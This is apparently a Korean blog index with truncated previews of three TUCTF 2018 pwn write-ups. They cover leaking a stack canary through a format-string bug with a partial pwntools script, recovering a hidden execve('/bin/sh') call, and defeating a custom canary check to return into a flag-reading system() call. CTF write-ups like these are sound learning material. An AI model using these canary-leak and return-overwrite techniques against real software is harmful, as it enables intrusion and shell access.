제리의 블로그

TUCTF 2018 PWN Timber 요약이번 문제에는 모든 함수에 canary 가 존재한다. 이름 입력하는 부분에서 포맷스트링버그(FSB)가 있다. 포맷스트링으로 canary 를 leak 할 수 있다. 알아낸 canary 로 덮고 RET 를 쉘을 주는 date() 라는 사용자 정의 함수로 덮어주면 된다. from pwn import * e = ELF('./timber') r = e.process() r.recvuntil(': ') # canary leak. FSB r.sendline('%20$p') r.recvuntil(' ') canary = int(r.recvline(), 16) log.success(hex(canary)) r.recvuntil('? ') r.sendline('s') # Super..

TUCTF 2018 PWN shella-hard 요약안티 디스어셈블링(?) 기법이 적용된 바이너리였다. 심볼 중에 giveShell 이라는 사용자 정의 함수가 있었다.BOF 를 통해서 RET 를 덮는 방식으로 giveShell 을 불러봤으나 쉘을 따지지 않았다.giveShell 을 자세히 보니 코드가 깨져있는것처럼 보였고살짝만 바꿔주면 execve("/bin/sh", 0, 0); 가 보인다.해당 주소로 리턴시켜주면 된다. .text:08048458 public giveShell .text:08048458 giveShell proc near .text:08048458 push ebp ; path .text:08048459 mov ebp, esp .text:0804845B nop .text:0804845B ..

TUCTF 2018 PWN Canary 요약이번 문제는 전역변수가 0 으로 초기화 된다는 점을 이용하여 canary 를 0 으로 맞추고 RET address 를 코드영역의 system("/bin/cat ./flag"); 로 돌리면 되는 문제이다. checkCanary() 함수를 보면 *(_DWORD *)(a1 + 40) 과 cans[*(_DWORD *)(a1 + 44)] 가 같은지 다른지에 따라 stack smash check 를 한다. a1 의 구역은 스택의 영역이고 cans 의 영역은 전역변수의 영역(.bss) 이다. 전역변수 cans[0] 에는 "/dev/urandom" 값이 저장되어 예측이 불가능하다. 그런데 cans 는 배열이므로 cans[1] 이상은 아직 0 으로 초기화되어있는 상태이다. 따라..